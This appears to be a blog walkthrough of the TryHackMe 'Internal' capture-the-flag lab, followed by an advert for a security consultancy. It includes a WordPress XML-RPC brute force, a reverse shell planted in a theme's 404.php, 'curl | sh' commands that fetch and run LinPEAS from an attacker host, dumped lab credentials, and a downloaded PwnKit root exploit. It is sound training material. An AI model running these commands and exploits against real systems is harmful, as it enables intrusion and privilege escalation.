The realm of cybersecurity is as vast as it is intriguing, and every once in a while, a challenge comes along that truly tests our mettle as ethical hackers. Such was the case with the ‘Internal’ Capture The Flag (CTF) challenge on TryHackMe.
Imagine being handed an environment, just weeks away from going live, with the simple directive: «See if you can break in.» No hand-holding, no hints—just you, your skills, and a digital fortress waiting to be breached. This isn’t just a game; it’s a simulation of a real-world scenario where penetration testers are given minimal information and tasked with assessing potential vulnerabilities.
In this post, I’ll walk you through my journey tackling the ‘Internal’ challenge. With two elusive flags—User.txt and Root.txt—as the prime objectives, and a myriad of potential entry points and vulnerabilities to discover, this CTF isn’t for the faint of heart.
What tools did I opt for, especially considering the challenge can be completed without Metasploit? How did I strategize my approach to mimic an actual penetration test? Dive in, as we navigate through the digital labyrinth of ‘Internal’, gleaning insights and tactics that are invaluable for both aspiring and experienced penetration testers.
Enumeration
Let’s start with basic NMAP scan:
nmap -n -Pn -sT -sV -T4 -v internal.thmWe will see two ports open:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelProbably, we have discovered a Linux server. Now while we trying to discover more information, we will scan all the server ports with NMAP:
nmap -n -Pn -sT -sV -T4 -p- -v internal.thmAfter check all the server ports we have the same result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelSo we will check the web server through our web client:
We have found the default Apache2 web page and if we check the source code we don’t see nothing. The next step is try to detect hidden directories with gobuster:
gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txtWe have discovered some directories:
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/blog (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
Probably we have found a WordPress installation:
Also we have discovered the user “admin” exists:
We have discovered phpMyAdmin access page:
Let’s try to detect WordPress vulnerabilities with “WPScan”:
wpscan --url http://internal.thm
Important information that we have discovered (XML-RPC, WordPress Readme, WP-Cron and WordPress version):
[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://internal.thm/blog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>Initial explotation
Let’s try to bruteforce WordPress “admin” sser with WPXploit through XML-RPC:
$ git clone https://github.com/relarizky/wpxploit.git
$ cd wpxploit
$ pip3 install -r requirements.txt
$ python3 exploit.py http://internal.thm/blog/ 5 15
Finally, we have found credentials for the user “admin”:
admin:my2boys
So, let’s try to access to the admin panel with the credentials and we will see we have access:
Now let’s try to execute a reverse shell. We will edit the default 404 page to execute our reverse shell:
Now we need to turn on our listener:
nc -lvnp 4433
Now we need to access to the 404 default page:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.phpSo we will receive our reverse shell:
Privilege escalation 1
But we don’t have access to the user yet. Then we will need to enumerate more with this shell. Let’s check the home directory:
ls -la /homeWe have discovered an interesting directory:
Let’s check the “/etc/passwd”:
We can confirm the user “aubreanna” exists. The next movement will be check the credentials from “wp-config.php” because we can find more information in phpMyAdmin panel:
cat wp-config.php
We don’t find more information into the phpMyAdmin. Let’s run LinPEAS to try to detect something but first we will turn on our web server to execute linpeas in our victim:
python3 -m http.server 8080Then from our reverse shell we will execute linpeas.sh in memory:
curl 10.10.69.20:8080/linpeas.sh | sh
If you remember we know we have the phpmyadmin application installed. So let’s check it:
Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root www-data 68 Aug 3 2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
-rw-r----- 1 root www-data 0 Aug 3 2020 /var/lib/phpmyadmin/config.inc.php
-rw-r----- 1 root www-data 527 Aug 3 2020 /etc/phpmyadmin/config-db.php
-rw-r----- 1 root www-data 8 Aug 3 2020 /etc/phpmyadmin/htpasswd.setup
We will check the directories but unfortunately we didn’t find nothing we can use:
$ cat /var/lib/phpmyadmin/blowfish_secret.inc.php
<?php
$cfg['blowfish_secret'] = '6wqoJ$mf_Wv($r?g$l4+#P#lAoCVVUM3';$ cat /etc/phpmyadmin/config-db.php
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='B2Ud4fEOZmVq';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';But after more enumeration we have found an interesting file:
cat /opt/wp-save.txtWith the “aubreanna” credentials:
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123Let’s check if we can access through SSH:
ssh aubreanna@internal.thm
Now we have access to the user flag.
Privilege Escalation 2
In this point we need to keep enumerating. So we will check the home directory:
ls -laaubreanna@internal:~$ ls -la
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 .
drwxr-xr-x 3 root root 4096 Aug 3 2020 ..
-rwx------ 1 aubreanna aubreanna 7 Aug 3 2020 .bash_history
-rwx------ 1 aubreanna aubreanna 220 Apr 4 2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr 4 2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .local
-rwx------ 1 root root 223 Aug 3 2020 .mysql_history
-rwx------ 1 aubreanna aubreanna 807 Apr 4 2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .ssh
-rwx------ 1 aubreanna aubreanna 0 Aug 3 2020 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna 55 Aug 3 2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 snap
-rwx------ 1 aubreanna aubreanna 21 Aug 3 2020 user.txtIf we check the file “jenkins.txt” we can see this:
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080Also, if we check the directory “snap” we can see a docker directory:
aubreanna@internal:~$ ls -la snap
total 12
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .
drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 ..
drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 docker
aubreanna@internal:~$ ls -la snap/docker/
total 8
drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 ..
lrwxrwxrwx 1 aubreanna aubreanna 3 Aug 3 2020 current -> 471We have information but we will execute LinPEAS to give us more information. We will execute our LinPEAS in memory, so, first of all we need to turn on our web server with python:
python3 -m http.server 8080Then we can execute LinPEAS in memory:
curl 10.10.14.171:8080/linpeas.sh | shWe can check if the vulnerability “PwnKit” is exploitable:
In this point we will upload this exploit:
aubreanna@internal:~$ curl 10.10.14.171:8080/PwnKit >> PwnKit.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 18040 100 18040 0 0 1355k 0 --:--:-- --:--:-- --:--:-- 1355k
Let’s execute this exploit:
aubreanna@internal:~$ ls
PwnKit.sh jenkins.txt snap user.txt
aubreanna@internal:~$ chmod +x PwnKit.sh
aubreanna@internal:~$ ./PwnKit.sh
root@internal:/home/aubreanna#
Then we will have access to root flag.
🔒 Hardsoft Security offers cybersecurity consulting services, ensuring that your business is always protected against the latest threats. And if you’re looking for hosting that prioritizes security, Secure Hosting is your ideal solution. We help keep your website safe with the best cybersecurity practices through our specialized cybersecurity advice.
Don’t wait to be the next target. Secure your online presence with the best solutions and services on the market. Contact Hardsoft Security and Secure Hosting today!
(Cybersecurity is not a luxury but a necessity. Protect your investment and your online reputation.).